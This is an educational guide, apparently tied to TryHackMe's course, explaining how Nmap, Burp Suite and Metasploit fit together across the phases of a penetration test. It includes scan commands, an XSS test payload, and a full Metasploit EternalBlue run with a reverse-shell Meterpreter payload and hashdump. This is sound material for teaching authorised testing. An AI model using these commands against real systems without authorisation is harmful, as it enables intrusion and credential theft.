Most guides that cover Nmap, Burp Suite, and Metasploit explain each tool in isolation. They tell you what Nmap does, what Burp Suite does, what Metasploit does, and leave you to figure out how a penetration tester actually uses all three together.
That gap matters. In a real engagement, no single tool gives you the full picture. Nmap tells you what is running and where. Burp Suite tells you how a web application handles input. Metasploit tells you whether a discovered vulnerability is actually exploitable. Each tool feeds the next. Understanding the hand-offs between them is what separates someone who has read about penetration testing from someone who can conduct it.
This guide walks through the practical workflow: what each tool does at its phase of an engagement, what it produces, and how that output shapes what you do next.
The Shape of a Penetration Test
Before covering the tools, it helps to understand the structure they fit into. A penetration test follows a consistent sequence of phases regardless of the specific target:
Reconnaissance and enumeration establishes the attack surface. You identify what systems are live, what ports are open, what services are running, and what versions of those services are exposed.
Vulnerability identification maps what was found during enumeration to known or potential weaknesses. Some vulnerabilities are immediately visible from version information. Others emerge from manual testing of how the application behaves.
Exploitation confirms that a vulnerability is genuinely exploitable, demonstrates the impact, and captures evidence for the report.
Post-exploitation explores what access was gained and what it enables, including privilege escalation, lateral movement, and data access.
Nmap owns the first phase. Burp Suite owns the vulnerability identification phase for web-facing targets. Metasploit is the primary tool for the exploitation phase. In practice the boundaries overlap, but that sequence is the mental model that makes the toolchain coherent.
Phase 1: Nmap - Mapping the Attack Surface
Nmap (Network Mapper) is the starting point of virtually every penetration test. Its job is to answer a deceptively simple question: what is running here, and what can be reached from the outside?
Host discovery establishes which IP addresses in scope are live. A basic ping sweep (nmap -sn 192.168.1.0/24) identifies responsive hosts before investing time in deeper scanning.
Port scanning identifies which ports are open on each host. A SYN scan (nmap -sS) is the default for most situations: it is fast, generates minimal noise, and returns reliable results without completing a full TCP handshake. UDP scanning (nmap -sU) is slower but important for services that run over UDP, including DNS, SNMP, and DHCP, which are frequently misconfigured and overlooked.
Service and version detection is where Nmap's output becomes genuinely useful for the next phase. The -sV flag probes open ports to identify what service is running and which version. A port 22 result showing OpenSSH 7.4 is not just a label — it is a data point that can be cross-referenced against known CVEs and Metasploit modules. Version information turns a list of open ports into an enumerated attack surface.
OS detection (-O) attempts to fingerprint the operating system, which informs which exploit paths and post-exploitation techniques are relevant.
Nmap Scripting Engine (NSE) is the layer most beginners underuse. NSE scripts extend Nmap from a scanner into an active enumeration tool. nmap --script vuln runs a library of vulnerability detection scripts against identified services. More targeted scripts exist for specific services: smb-vuln-ms17-010 checks for EternalBlue, http-enum enumerates web directories, ftp-anon checks whether FTP allows anonymous login.
A typical Nmap command for a structured engagement scan:
nmap -sS -sV -O -A -p- --script=default,vuln -oN scan_results.txt 192.168.1.10
The -oN flag saves output to a file, which is important. Everything Nmap finds feeds into what comes next, and you need it in a readable format.
What Nmap hands off to the next phase: A list of open ports, identified services and versions, OS fingerprint, and any NSE findings. If web services are running (ports 80, 443, 8080, 8443), Burp Suite takes over. If known vulnerable services are identified (SMB on 445, outdated software with known CVEs), Metasploit becomes relevant.
Phase 2: Burp Suite - Testing the Web Application
Where Nmap surveys the network, Burp Suite goes deep into web-facing applications. It sits between your browser and the target, intercepting every HTTP request and response so you can examine, modify, and replay them.
Setting up the proxy is the first step. Burp Suite runs a local proxy on port 8080. You configure your browser to route traffic through it, and from that point every request you make is captured in Burp's HTTP History. This gives you a complete record of how the application communicates.
Mapping the application comes before any active testing. Browse every function the application exposes: login, registration, search, file upload, user settings, any API endpoints visible in JavaScript files. Burp's site map builds a visual representation of the application's structure as you explore it. Anything that processes user input is a potential test target.
The Repeater module is where manual testing happens. When you find a request worth investigating, right-click and send it to Repeater. You can now modify any parameter and resend the request as many times as you want, observing how the application responds to different input. This is how you test for SQL injection: substitute a single quote into a parameter and observe whether the application throws a database error. It is how you test for XSS: inject <script>alert(1)</script> and see if it executes. It is how you test for IDOR: change a numeric user ID in a request and see if you can access another user's data.
The Intruder module automates repetitive tests. Highlight a parameter in a captured request, mark it as a payload position, and Intruder will iterate through a wordlist or a set of test values automatically. Useful for password brute force, parameter fuzzing, and enumerating valid values. The Community Edition throttles Intruder speed significantly — using a custom Python script or Turbo Intruder extension is the workaround most testers use.
The Scanner module (Pro only) runs automated vulnerability detection across the application. It identifies common issues including SQL injection, XSS, SSRF, XML injection, and path traversal. Automated scanning is a starting point, not a conclusion. Business logic vulnerabilities — broken access controls, insecure direct object references, privilege escalation through parameter manipulation — require manual investigation because automated tools do not understand the application's intended behaviour.
What Burp Suite hands off: Confirmed vulnerability findings with HTTP evidence (the exact request and response that demonstrates the issue), reproduction steps, and an assessment of impact. When Burp identifies a confirmed exploitable vulnerability that Metasploit has a module for, the evidence from Burp informs the exploitation phase.
Phase 3: Metasploit - Validating and Demonstrating Exploitation
Metasploit's role in a structured engagement is not to discover vulnerabilities. It is to confirm that they are exploitable and to demonstrate the impact in a way that clients and developers can understand and act on.
The Metasploit framework is organised into modules: exploits (which deliver a payload to a vulnerable service), auxiliary (which perform scanning, fuzzing, and enumeration without a payload), and post-exploitation (which operate after a session is established). This separation supports clean, documented testing.
Searching for relevant modules starts from what Nmap and Burp found. If Nmap identified a service running a version with a known CVE, search in the Metasploit console finds relevant modules:
search type:exploit name:ms17-010
search type:exploit name:vsftpd
Configuring and running an exploit requires setting the RHOSTS (target), LHOST (your machine), and any other required options, then running it:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set LHOST 192.168.1.5
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
If successful, you receive a Meterpreter session — an interactive shell on the compromised system that enables you to demonstrate impact: running commands, accessing files, showing what an attacker could do from that position.
Post-exploitation explores the consequences of the compromise. Commands including getuid, sysinfo, hashdump, and run post/multi/recon/local_exploit_suggester document what the access enables and what further privilege escalation paths exist.
The critical discipline with Metasploit in a real engagement is documentation. Every step should be captured: the exact module used, the options configured, the output received, and the timestamp. Professional reports require reproducible evidence. Running an exploit and forgetting to capture the session output is a common beginner mistake that creates problems at report writing time.
How the Three Tools Connect in Practice
The workflow is not always strictly sequential. A more realistic description of how the toolchain operates together:
Nmap identifies a host running Apache 2.4.49 on port 80. That version is known to be vulnerable to a path traversal and remote code execution flaw (CVE-2021-41773). Burp Suite is used to manually confirm the path traversal, capturing the exact HTTP request that demonstrates the vulnerability and the response that shows unauthorised file access. Metasploit is then used to run the corresponding exploit module, confirm code execution, and capture the evidence needed for the report.
In another scenario: Nmap identifies an old SMB service on port 445. NSE scripts flag it as potentially vulnerable to MS17-010 (EternalBlue). Metasploit's exploit/windows/smb/ms17_010_eternalblue is run directly, bypassing Burp Suite entirely since this is a network-layer exploit rather than a web application issue.
In a third scenario: Burp Suite identifies an SQL injection vulnerability during manual testing that did not appear in any Nmap output and would not be in Metasploit's module library. SQLmap is brought in to confirm and enumerate the injection, demonstrating what data the vulnerability exposes.
The point is that each tool has a defined role and a defined scope. Knowing when to use each one, and when to hand off to the next, is the practical skill that structured practice builds.
Building These Skills on TryHackMe
Each of these tools has dedicated learning content on TryHackMe, and the Jr Penetration Tester path puts them together in a structured sequence that mirrors how they are used in real engagements. You practise Nmap enumeration on real machines, use Burp Suite against live web applications in guided scenarios, and work through Metasploit exploitation across web, network, and Active Directory targets.
The PT1 certification then tests whether you can apply the full toolchain independently across a simulated 48-hour engagement, including a graded professional report. That combination of guided learning and practical examination is where tool familiarity becomes demonstrable skill.
Nick O'Grady